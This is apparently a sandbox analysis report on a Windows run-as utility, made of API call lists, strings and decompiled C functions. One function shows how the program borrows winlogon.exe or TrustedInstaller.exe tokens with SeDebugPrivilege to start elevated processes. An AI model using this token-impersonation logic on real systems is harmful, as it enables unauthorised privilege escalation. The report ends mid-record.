0x00402784
0x0040278d
0x004027a4
0x004027b3
0x004027b8
0x004027bb
0x004027bf
0x004027c6
0x004027c6
0x004027d1
0x004027d6
0x004027d9
0x004027db
0x004027e2
0x004027e4
0x004027e4
0x004027e7
0x004027f4
0x004027fc
0x00402801
0x00402801
0x00402803
0x00402803
0x00402806
0x00000000
0x00402806
0x00402715
0x00402729
0x0040272e
0x00402731
0x00402738
0x00402738
0x00402743
0x00402748
0x0040274d
0x00402754
0x00402756
0x00402756
0x00402759
0x00402763
0x00000000
0x00402763
0x004026fb
0x00402700
0x00402702
0x00000000
0x00402702
0x004026ec
0x00000000
0x004026ec
0x004026dd
0x00000000
0x004026dd
0x004026ce
0x00000000
0x004026ce
0x004026ac
0x00402443
0x0040246a
0x00402470
0x00000000
0x00402470

APIs

memset.MSVCRT ref: 00402300
memset.MSVCRT ref: 0040233E
memset.MSVCRT ref: 00402356

Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940

wcschr.MSVCRT ref: 00402387
ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 004023A0

Part of subcall function 00404B5C: wcscpy.MSVCRT ref: 00404B61
Part of subcall function 00404B5C: wcsrchr.MSVCRT ref: 00404B69

wcschr.MSVCRT ref: 004023B7
memset.MSVCRT ref: 004023D9
SearchPathW.KERNEL32(00000000,?,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00000208), ref: 004023F6
wcschr.MSVCRT ref: 0040242B
ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00402443
memset.MSVCRT ref: 004024BE
memset.MSVCRT ref: 004024D1
_wtoi.MSVCRT ref: 00402519
_wtoi.MSVCRT ref: 0040252B
memset.MSVCRT ref: 00402561
memset.MSVCRT ref: 00402574
_wtoi.MSVCRT ref: 004025BC
_wtoi.MSVCRT ref: 004025CE
wcschr.MSVCRT ref: 004025F0
memset.MSVCRT ref: 0040260F
ExpandEnvironmentStringsW.KERNEL32(?,?,00002000,?,?,?,?,?,?,?,?,00000208), ref: 00402624
_snwprintf.MSVCRT ref: 0040264C
SetEnvironmentVariableW.KERNEL32(__COMPAT_LAYER,00000000), ref: 00402819
GetProcessAffinityMask.KERNEL32(?,?,000000FF), ref: 00402879
SetProcessAffinityMask.KERNEL32(?,000000FF), ref: 00402888

Strings

256COLOR, xrefs: 004026AE
DISABLETHEMES, xrefs: 004026DD
D, xrefs: 00402374
RunAsInvoker, xrefs: 00402677
DISABLEDWM, xrefs: 004026EC
__COMPAT_LAYER, xrefs: 00402814
"%s" %s, xrefs: 0040263B
HIGHDPIAWARE, xrefs: 004026FB
16BITCOLOR, xrefs: 004026BA
640X480, xrefs: 004026CE

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$Environment_wtoiwcschr$ExpandStrings$AffinityMaskProcess$PathSearchVariable_snwprintfmemcpywcscpywcslenwcsrchr
String ID: "%s" %s$16BITCOLOR$256COLOR$640X480$D$DISABLEDWM$DISABLETHEMES$HIGHDPIAWARE$RunAsInvoker$__COMPAT_LAYER
API String ID: 2452314994-435178042
Opcode ID: 067d403336562cb18e4ef95dc35e81972e5343f3ed9e099bed5cf17b41ec62b0
Instruction ID: b54a7db1e05dda42e7bfc3830e2036fe484084dd7c1f23c6c807eede0ded9d8d
Opcode Fuzzy Hash: 067d403336562cb18e4ef95dc35e81972e5343f3ed9e099bed5cf17b41ec62b0
Instruction Fuzzy Hash: 03F14F72900218AADB20EFA5CD85ADEB7B8EF04304F1045BBE619B71D1D7789A84CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00408533, Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 259
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00408533(void* __ecx, void* __edx, void* __eflags, char _a8, intOrPtr _a12, char _a32, WCHAR* _a40, WCHAR* _a44, intOrPtr _a48, WCHAR* _a52, WCHAR* _a56, char _a60, int _a64, char* _a68, int _a72, char _a76, int _a80, char* _a84, int _a88, long _a92, void _a94, long _a620, void _a622, char _a1132, char _a1148, WCHAR* _a3196, WCHAR* _a3200, WCHAR* _a3204, WCHAR* _a3208, void* _a3212, char _a3216, int _a5264, int _a5268, int _a5272, int _a5276, int _a5280, char _a5288, char _a5292, int _a7340, int _a7344, int _a7348, int _a7352, int _a7356) {
				char _v0;
				WCHAR* _v4;
				void* __edi;
				void* __esi;
				void* _t76;
				void* _t82;
				wchar_t* _t85;
				void* _t86;
				void* _t87;
				intOrPtr _t92;
				wchar_t* _t93;
				intOrPtr _t95;
				int _t106;
				char* _t110;
				intOrPtr _t115;
				wchar_t* _t117;
				intOrPtr _t124;
				wchar_t* _t125;
				intOrPtr _t131;
				wchar_t* _t132;
				int _t156;
				void* _t159;
				intOrPtr _t162;
				void* _t177;
				void* _t178;
				void* _t179;
				intOrPtr _t181;
				int _t187;
				intOrPtr _t188;
				intOrPtr _t190;
				intOrPtr _t198;
				signed int _t205;
				signed int _t206;

				_t179 = __edx;
				_t158 = __ecx;
				_t206 = _t205 & 0xfffffff8;
				E0040B550(0x1ccc, __ecx);
				_t76 = E0040313D(_t158);
				if(_t76 != 0) {
					E0040AC52();
					SetErrorMode(0x8001); // executed
					_t156 = 0;
					 *0x40fa70 = 0x11223344;
					EnumResourceTypesW(GetModuleHandleW(0), E0040A3C1, 0); // executed
					_t82 = E00405497( &_a8);
					_a48 = 0x20;
					_a40 = 0;
					_a52 = 0;
					_a44 = 0;
					_a56 = 0;
					E004056B5(_t158, __eflags, _t82, _a12);
					E00408F48(_t158, __eflags, L"SeDebugPrivilege"); // executed
					 *_t206 = L"/SpecialRun";
					_t85 = E0040585C( &_v0);
					__eflags = _t85;
					if(_t85 != 0) {
						L8:
						_t86 = E0040585C( &_a8, L"/Run");
						__eflags = _t86 - _t156;
						if(_t86 < _t156) {
							_t87 = E0040585C( &_a8, L"/cfg");
							__eflags = _t87 - _t156;
							if(_t87 >= _t156) {
								_t162 =  *0x40fa74; // 0x4101c8
								_t41 = _t87 + 1; // 0x1
								ExpandEnvironmentStringsW(E0040584C( &_a8, _t41), _t162 + 0x5504, 0x104);
								_t115 =  *0x40fa74; // 0x4101c8
								_t117 = wcschr(_t115 + 0x5504, 0x5c);
								__eflags = _t117;
								if(_t117 == 0) {
									_a92 = _t156;
									memset( &_a94, _t156, 0x208);
									_a620 = _t156;
									memset( &_a622, _t156, 0x208);
									GetCurrentDirectoryW(0x104,  &_a92);
									_t124 =  *0x40fa74; // 0x4101c8
									_t125 = _t124 + 0x5504;
									_v4 = _t125;
									_t187 = wcslen(_t125);
									_t51 = wcslen( &_a92) + 1; // 0x1
									__eflags = _t187 + _t51 - 0x104;
									if(_t187 + _t51 >= 0x104) {
										_a620 = _t156;
									} else {
										E00404BE4( &_a620,  &_a92, _v4);
									}
									_t131 =  *0x40fa74; // 0x4101c8
									_t132 = _t131 + 0x5504;
									__eflags = _t132;
									wcscpy(_t132,  &_a620);
								}
							}
							E00402F31(_t156);
							_t181 =  *0x40fa74; // 0x4101c8
							_pop(_t159);
							_a84 =  &_a8;
							_a76 = 0x40cb0c;
							_a88 = _t156;
							_a80 = _t156;
							E0040177C( &_a76, _t181 + 0x10, __eflags, _t156);
							_t92 =  *0x40fa74; // 0x4101c8
							__eflags =  *((intOrPtr*)(_t92 + 0x5710)) - _t156;
							if( *((intOrPtr*)(_t92 + 0x5710)) == _t156) {
								_t93 = E0040585C( &_a8, L"/savelangfile");
								__eflags = _t93;
								if(_t93 < 0) {
									E00406420();
									__imp__CoInitialize(_t156);
									_t95 =  *0x40fa74; // 0x4101c8
									E00408910(_t95 + 0x10, _t159, 0x416f60);
									 *((intOrPtr*)( *0x4158e0 + 8))(_t156);
									_t198 =  *0x40fa74; // 0x4101c8
									E00408910(0x416f60, 0x4158e0, _t198 + 0x10);
									E00402F31(1);
									__imp__CoUninitialize();
								} else {
									E004065BE(_t159);
								}
								goto L7;
							} else {
								_t64 = _t92 + 0x10; // 0x4101d8
								_a7356 = _t156;
								_a7352 = _t156;
								_a7340 = _t156;
								_a7344 = _t156;
								_a7348 = _t156;
								_t156 = E00401D40(_t179, _t64,  &_a5292);
								_t110 =  &_a5288;
								L6:
								E004035FB(_t110);
								L7:
								E004054B9( &_v0);
								E004099D4( &_a32);
								E004054B9( &_v0);
								_t106 = _t156;
								goto L2;
							}
						}
						_t26 = _t86 + 1; // 0x1
						_t173 = _t26;
						__eflags =  *((intOrPtr*)(E0040584C( &_a8, _t26))) - _t156;
						if(__eflags == 0) {
							E00402F31(_t156);
						} else {
							E00402FC6(_t173, __eflags, _t138);
						}
						_t188 =  *0x40fa74; // 0x4101c8
						_a68 =  &_a8;
						_a60 = 0x40cb0c;
						_a72 = _t156;
						_a64 = _t156;
						E0040177C( &_a60, _t188 + 0x10, __eflags, _t156);
						_t190 =  *0x40fa74; // 0x4101c8
						_a5280 = _t156;
						_a5276 = _t156;
						_a5264 = _t156;
						_a5268 = _t156;
						_a5272 = _t156;
						_t156 = E00401D40(_t179, _t190 + 0x10,  &_a3216);
						_t110 =  &_a3212;
						goto L6;
					}
					__eflags = _a56 - 3;
					if(_a56 != 3) {
						goto L8;
					}
					__eflags = 1;
					_a3212 = 0;
					_a3208 = 0;
					_a3196 = 0;
					_a3200 = 0;
					_a3204 = 0;
					_v4 = 0;
					_v0 = 0;
					swscanf(E0040584C( &_v0, 1), L"%I64x",  &_v4);
					_t177 = 2;
					_push(E0040584C( &_v0, _t177));
					L0040B1F8();
					_pop(_t178);
					_t156 = E00401AC9(_t178, _t179, __eflags,  &_a1148, _v4, _v0, _t152);
					_t110 =  &_a1132;
					goto L6;
				} else {
					_t106 = _t76 + 1;
					L2:
					return _t106;
				}
			}

0x00408533
0x00408533
0x00408536
0x0040853e
0x00408546
0x0040854d
0x00408559
0x00408563
0x00408569
0x00408572
0x00408583
0x0040858d
0x00408595
0x0040859e
0x004085a2
0x004085a6
0x004085aa
0x004085ae
0x004085b8
0x004085c1
0x004085c8
0x004085cd
0x004085cf
0x0040867f
0x00408688
0x0040868d
0x0040868f
0x00408730
0x00408735
0x00408737
0x0040873d
0x00408750
0x0040875d
0x00408763
0x00408770
0x00408775
0x00408779
0x0040878b
0x00408790
0x004087a2
0x004087aa
0x004087b8
0x004087be
0x004087c3
0x004087c9
0x004087d2
0x004087df
0x004087e3
0x004087e6
0x00408801
0x004087e8
0x004087f8
0x004087fe
0x00408811
0x00408816
0x00408816
0x0040881c
0x00408822
0x00408779
0x00408824
0x00408829
0x00408833
0x00408834
0x00408840
0x00408848
0x0040884c
0x00408850
0x00408855
0x0040885a
0x00408860
0x004088ac
0x004088b1
0x004088b3
0x004088bf
0x004088c5
0x004088cb
0x004088da
0x004088ea
0x004088ed
0x004088f8
0x004088ff
0x00408905
0x004088b5
0x004088b5
0x004088b5
0x00000000
0x00408862
0x00408862
0x0040886d
0x00408874
0x0040887b
0x00408882
0x00408889
0x00408895
0x00408897
0x00408658
0x00408658
0x0040865d
0x00408661
0x0040866a
0x00408673
0x00408678
0x00000000
0x00408678
0x00408860
0x00408695
0x00408695
0x0040869f
0x004086a2
0x004086af
0x004086a4
0x004086a7
0x004086a7
0x004086b4
0x004086bf
0x004086cb
0x004086d3
0x004086d7
0x004086db
0x004086e0
0x004086f1
0x004086f8
0x004086ff
0x00408706
0x0040870d
0x00408719
0x0040871b
0x00000000
0x0040871b
0x004085d5
0x004085da
0x00000000
0x00000000
0x004085ec
0x004085ef
0x004085f6
0x004085fd
0x00408604
0x0040860b
0x00408612
0x00408616
0x00408620
0x0040862a
0x00408632
0x00408633
0x00408638
0x0040864f
0x00408651
0x00000000
0x0040854f
0x0040854f
0x00408550
0x00408556
0x00408556

APIs

Part of subcall function 0040313D: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040315C
Part of subcall function 0040313D: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0040316E
Part of subcall function 0040313D: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403182
Part of subcall function 0040313D: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004031AD

SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00408563
GetModuleHandleW.KERNEL32(00000000,0040A3C1,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040857C
EnumResourceTypesW.KERNEL32(00000000,?,00000002), ref: 00408583
swscanf.MSVCRT ref: 00408620
_wtoi.MSVCRT ref: 00408633

Strings

%I64x, xrefs: 004085E7
/cfg, xrefs: 00408727
`oA, xrefs: 004088D0
SeDebugPrivilege, xrefs: 004085B3
/Run, xrefs: 0040867F
/savelangfile, xrefs: 004088A3
XA, xrefs: 004088E5
, xrefs: 00408595

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes_wtoiswscanf
String ID: $%I64x$/Run$/cfg$/savelangfile$SeDebugPrivilege$`oA$XA
API String ID: 3933224404-3784219877
Opcode ID: 1ed12eb10884b9e827e0875f5387ef1e7972f3b4abe7ba30fea96de0eb1c323a
Instruction ID: 6a1ad454fb11d14b300c4ed281ce3bcdfe782ea4983c0409628bf6e0aeb57f2c
Opcode Fuzzy Hash: 1ed12eb10884b9e827e0875f5387ef1e7972f3b4abe7ba30fea96de0eb1c323a
Instruction Fuzzy Hash: 7FA16F71508340DBD720EF65DD8599BB7E8FB88308F50493FF588A3292DB3899098F5A

Uniqueness

Uniqueness Score: -1.00%

Function 00401FE6, Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 243
processCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E00401FE6(void* __eax, void* __ecx, void* __edx, WCHAR* _a4, WCHAR* _a8, long _a12, void* _a16, WCHAR* _a20, struct _STARTUPINFOW* _a24, struct _PROCESS_INFORMATION* _a28) {
				int _v8;
				long _v12;
				wchar_t* _v16;
				void _v546;
				long _v548;
				void _v1074;
				char _v1076;
				void* __esi;
				long _t84;
				int _t87;
				wchar_t* _t88;
				int _t92;
				void* _t93;
				int _t94;
				int _t96;
				int _t99;
				int _t104;
				long _t105;
				int _t110;
				void** _t112;
				int _t113;
				intOrPtr _t131;
				wchar_t* _t132;
				int* _t148;
				wchar_t* _t149;
				int _t151;
				void* _t152;
				void* _t153;
				int _t154;
				void* _t155;
				long _t160;

				_t145 = __edx;
				_t152 = __ecx;
				_t131 =  *((intOrPtr*)(__eax + 0x44a8));
				_v12 = 0;
				if(_t131 != 4) {
					__eflags = _t131 - 5;
					if(_t131 != 5) {
						__eflags = _t131 - 9;
						if(__eflags != 0) {
							__eflags = _t131 - 8;
							if(_t131 != 8) {
								__eflags = _t131 - 6;
								if(_t131 != 6) {
									__eflags = _t131 - 7;
									if(_t131 != 7) {
										__eflags = CreateProcessW(_a4, _a8, 0, 0, 0, _a12, _a16, _a20, _a24, _a28);
									} else {
										_t132 = __eax + 0x46b6;
										_t148 = __eax + 0x48b6;
										__eflags =  *_t148;
										_v16 = _t132;
										_v8 = __eax + 0x4ab6;
										if( *_t148 == 0) {
											_t88 = wcschr(_t132, 0x40);
											__eflags = _t88;
											if(_t88 != 0) {
												_t148 = 0;
												__eflags = 0;
											}
										}
										_t153 = _t152 + 0x800;
										E0040289F(_t153);
										_t154 =  *(_t153 + 0xc);
										__eflags = _t154;
										if(_t154 == 0) {
											_t87 = 0;
											__eflags = 0;
										} else {
											_t87 =  *_t154(_v16, _t148, _v8, 1, _a4, _a8, _a12, _a16, _a20, _a24, _a28);
										}
										__eflags = _t87;
									}
									if(__eflags == 0) {
										_t84 = GetLastError();
										L43:
										_v12 = _t84;
									}
									goto L44;
								}
								__eflags = E00401D99(__eax + 0x44ac, __edx);
								if(__eflags == 0) {
									goto L44;
								}
								_t92 = E0040A46C(_t131, __eflags,  &_a28, _t90, _a4, _a8, _a12, _a20, _a24, _a28);
								__eflags = _t92;
								if(_t92 != 0) {
									goto L44;
								}
								_t84 = _a28;
								goto L43;
							}
							_t93 = OpenSCManagerW(0, L"ServicesActive", 0x35); // executed
							__eflags = _t93;
							if(_t93 != 0) {
								E00401306(_t93); // executed
							}
							_v8 = 0;
							_t94 = E00401F04(_t145, _t152); // executed
							__eflags = _t94;
							_v12 = _t94;
							if(__eflags == 0) {
								_t96 = E00401DF9(_t145, __eflags, _t152, L"TrustedInstaller.exe",  &_v8); // executed
								__eflags = _t96;
								_v12 = _t96;
								if(_t96 == 0) {
									_t99 = E004028ED(_t152 + 0x800, _v8, _a4, _a8, _a12, _a16, _a20, _a24, _a28);
									__eflags = _t99;
									if(_t99 == 0) {
										_v12 = GetLastError();
									}
									CloseHandle(_v8); // executed
								}
								RevertToSelf(); // executed
							}
							goto L44;
						}
						_t104 = E0040598B(__edx, __eflags, __eax + 0x46b6);
						__eflags = _t104;
						if(_t104 == 0) {
							goto L44;
						}
						_v8 = 0;
						_t105 = E00401E44(_t152, _t104,  &_v8);
						goto L14;
					}
					_t149 = __eax + 0x44ac;
					_t110 = wcslen(_t149);
					__eflags = _t110;
					if(_t110 <= 0) {
						goto L44;
					} else {
						_v8 = 0;
						__eflags = E00404EA9(_t149, _t110);
						_t112 =  &_v8;
						_push(_t112);
						_push(_t149);
						if(__eflags == 0) {
							_push(_t152);
							_t113 = E00401DF9(_t145, __eflags);
						} else {
							L0040B1F8();
							_push(_t112);
							_push(_t152);
							_t113 = E00401E44();
						}
						_v12 = _t113;
						__eflags = _t113;
						goto L15;
					}
				} else {
					_v548 = 0;
					memset( &_v546, 0, 0x208);
					_v1076 = 0;
					memset( &_v1074, 0, 0x208);
					E00404C3C( &_v548);
					 *((intOrPtr*)(_t155 + 0x18)) = L"winlogon.exe";
					_t151 = wcslen(??);
					_t10 = wcslen( &_v548) + 1; // 0x1
					_t159 = _t151 + _t10 - 0x104;
					if(_t151 + _t10 >= 0x104) {
						_v1076 = 0;
					} else {
						E00404BE4( &_v1076,  &_v548, L"winlogon.exe");
					}
					_v8 = 0;
					_t105 = E00401DF9(_t145, _t159, _t152,  &_v1076,  &_v8);
					L14:
					_t160 = _t105;
					_v12 = _t105;
					L15:
					if(_t160 == 0) {
						if(E004028ED(_t152 + 0x800, _v8, _a4, _a8, _a12, _a16, _a20, _a24, _a28) == 0) {
							_v12 = GetLastError();
						}
						CloseHandle(_v8);
					}
					L44:
					return _v12;
				}
			}

0x00401fe6
0x00401ff1
0x00401ff3
0x00401fff
0x00402002
0x004020a8
0x004020ab
0x004020f3
0x004020f6
0x00402162
0x00402165
0x004021f2
0x004021f5
0x00402235
0x00402238
0x004022be
0x0040223a
0x0040223a
0x00402240
0x0040224b
0x0040224e
0x00402251
0x00402254
0x00402259
0x0040225e
0x00402262
0x00402264
0x00402264
0x00402264
0x00402262
0x00402266
0x0040226c
0x00402271
0x00402274
0x00402276
0x0040229a
0x0040229a
0x00402278
0x00402296
0x00402296
0x0040229c
0x0040229c
0x004022c0
0x004022c2
0x004022c8
0x004022c8
0x004022c8
0x00000000
0x004022c0
0x00402201
0x00402203
0x00000000
0x00000000
0x00402220
0x00402225
0x00402227
0x00000000
0x00000000
0x0040222d
0x00000000
0x0040222d
0x00402173
0x00402179
0x0040217b
0x0040217e
0x00402183
0x00402185
0x00402188
0x0040218d
0x0040218f
0x00402192
0x004021a2
0x004021a7
0x004021a9
0x004021ac
0x004021cc
0x004021d1
0x004021d3
0x004021db
0x004021db
0x004021e1
0x004021e1
0x004021e7
0x004021e7
0x00000000
0x00402192
0x004020fe
0x00402103
0x00402105
0x00000000
0x00000000
0x00402111
0x00402114
0x00000000
0x00402114
0x004020ad
0x004020b4
0x004020b9
0x004020bc
0x00000000
0x004020c2
0x004020c4
0x004020ce
0x004020d0
0x004020d3
0x004020d4
0x004020d5
0x004020e6
0x004020e7
0x004020d7
0x004020d7
0x004020dd
0x004020de
0x004020df
0x004020df
0x004020ec
0x004020ef
0x00000000
0x004020ef
0x00402008
0x00402016
0x0040201d
0x0040202e
0x00402035
0x00402044
0x00402049
0x00402055
0x00402064
0x00402068
0x0040206e
0x0040208b
0x00402070
0x00402082
0x00402088
0x0040209e
0x004020a1
0x00402119
0x00402119
0x0040211b
0x0040211e
0x0040211e
0x00402149
0x00402151
0x00402151
0x00402157
0x00402157
0x004022cb
0x004022d2
0x004022d2

APIs

memset.MSVCRT ref: 0040201D
memset.MSVCRT ref: 00402035

Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62

wcslen.MSVCRT ref: 00402050
wcslen.MSVCRT ref: 0040205F
wcslen.MSVCRT ref: 004020B4
_wtoi.MSVCRT ref: 004020D7
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 0040214B
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 00402157
OpenSCManagerW.SECHOST(00000000,ServicesActive,00000035,?,?,00000000), ref: 00402173
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,TrustedInstaller.exe,?,?), ref: 004021D5
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,TrustedInstaller.exe,?,?), ref: 004021E1
RevertToSelf.KERNELBASE(?,TrustedInstaller.exe,?,?), ref: 004021E7

Part of subcall function 00404BE4: wcscpy.MSVCRT ref: 00404BEC
Part of subcall function 00404BE4: wcscat.MSVCRT ref: 00404BFB

Part of subcall function 0040598B: memset.MSVCRT ref: 004059B5
Part of subcall function 0040598B: _wcsicmp.MSVCRT ref: 004059FA
Part of subcall function 0040598B: wcschr.MSVCRT ref: 00405A0E
Part of subcall function 0040598B: _wcsicmp.MSVCRT ref: 00405A20
Part of subcall function 0040598B: OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00405A36
Part of subcall function 0040598B: OpenProcessToken.ADVAPI32(00000000,00000002,?), ref: 00405A4C
Part of subcall function 0040598B: CloseHandle.KERNEL32(?), ref: 00405A5A
Part of subcall function 0040598B: CloseHandle.KERNEL32(00000000), ref: 00405A61

Part of subcall function 00401E44: OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,winlogon.exe,?,00000000,winlogon.exe,00000000), ref: 00401E5C
Part of subcall function 00401E44: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401ED8
Part of subcall function 00401E44: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401EEB

wcschr.MSVCRT ref: 00402259
CreateProcessW.KERNEL32 ref: 004022B8
GetLastError.KERNEL32(?,?,00000000), ref: 004022C2

Strings

TrustedInstaller.exe, xrefs: 0040219C
winlogon.exe, xrefs: 00402049, 00402076
ServicesActive, xrefs: 0040216D

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandle$OpenProcess$ErrorLastmemsetwcslen$_wcsicmpwcschrwcscpy$CreateDirectoryManagerRevertSelfSystemToken_wtoiwcscat
String ID: ServicesActive$TrustedInstaller.exe$winlogon.exe
API String ID: 3201562063-2355939583
Opcode ID: 36f9f8526d762d4bf55260197473f7f83151b965ca01539aa69d60d29f45efaf
Instruction ID: ccbcfbde9fdc9ff515b0a1e4c69409fc0ea490cdea51ab3e51e2115b03466e24
Opcode Fuzzy Hash: 36f9f8526d762d4bf55260197473f7f83151b965ca01539aa69d60d29f45efaf
Instruction Fuzzy Hash: 02813A76800209EACF11AFE0CD899AE7BA9FF08308F10457AFA05B21D1D7798A549B59

Uniqueness

Uniqueness Score: -1.00%

Function 00409921, Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 29
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409921(struct HINSTANCE__** __esi) {
				void* _t6;
				struct HINSTANCE__* _t7;
				_Unknown_base(*)()* _t12;
				CHAR* _t13;
				intOrPtr* _t17;

				if( *__esi == 0) {
					_t7 = E00405436(L"psapi.dll"); // executed
					 *_t17 = "GetModuleBaseNameW";
					 *__esi = _t7;
					__esi[1] = GetProcAddress(_t7, _t13);
					__esi[2] = GetProcAddress( *__esi, "EnumProcessModules");
					__esi[4] = GetProcAddress( *__esi, "GetModuleFileNameExW");
					__esi[5] = GetProcAddress( *__esi, "EnumProcesses");
					_t12 = GetProcAddress( *__esi, "GetModuleInformation");
					__esi[3] = _t12;
					return _t12;
				}
				return _t6;
			}

0x00409924
0x0040992c
0x00409937
0x0040993f
0x0040994a
0x00409956
0x00409962
0x0040996e
0x00409971
0x00409973
0x00000000
0x00409976
0x00409977

APIs

Part of subcall function 00405436: memset.MSVCRT ref: 00405456
Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492

GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00409941
GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 0040994D
GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00409959
GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00409965
GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00409971

Strings

EnumProcesses, xrefs: 0040995B
EnumProcessModules, xrefs: 00409943
GetModuleBaseNameW, xrefs: 00409937
GetModuleFileNameExW, xrefs: 0040994F
GetModuleInformation, xrefs: 00409967
psapi.dll, xrefs: 00409927

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$LibraryLoad$memsetwcscat
String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
API String ID: 1529661771-70141382
Opcode ID: 5bb6ae9af13ee73b8e972736f9e45c56a416d8eed90bd4e1aed24245ad07e366
Instruction ID: 092d130926b261125bd3b69643a6c94717898c68ce40be050c227dd31faca138
Opcode Fuzzy Hash: 5bb6ae9af13ee73b8e972736f9e45c56a416d8eed90bd4e1aed24245ad07e366
Instruction Fuzzy Hash: C7F0D4B4D40704AECB306FB59C09E16BAE1EFA8700B614D3EE0C1A3290D7799044CF48

Uniqueness

Uniqueness Score: -1.00%

Function 0040B2C6, Relevance: 18.1, APIs: 12, Instructions: 134COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,0040C390,00000070), ref: 0040B2D5
__set_app_type.MSVCRT ref: 0040B334
__p__fmode.MSVCRT ref: 0040B349
__p__commode.MSVCRT ref: 0040B357
__setusermatherr.MSVCRT ref: 0040B383
_initterm.MSVCRT ref: 0040B399
__wgetmainargs.KERNELBASE ref: 0040B3BC
_initterm.MSVCRT ref: 0040B3CF
GetStartupInfoW.KERNEL32(?), ref: 0040B42C
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 0040B452
exit.KERNELBASE ref: 0040B469
_cexit.MSVCRT ref: 0040B46F

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
String ID:
API String ID: 2827331108-0
Opcode ID: 480d2f0d1e59e5c54fd79cbec4a7142595e90bf4a66800abf037708ca1cfab7b
Instruction ID: dde25c0b0dc41f5004a610fd87b0135bea3e3095e736c0cca49ec984ade2cc6a
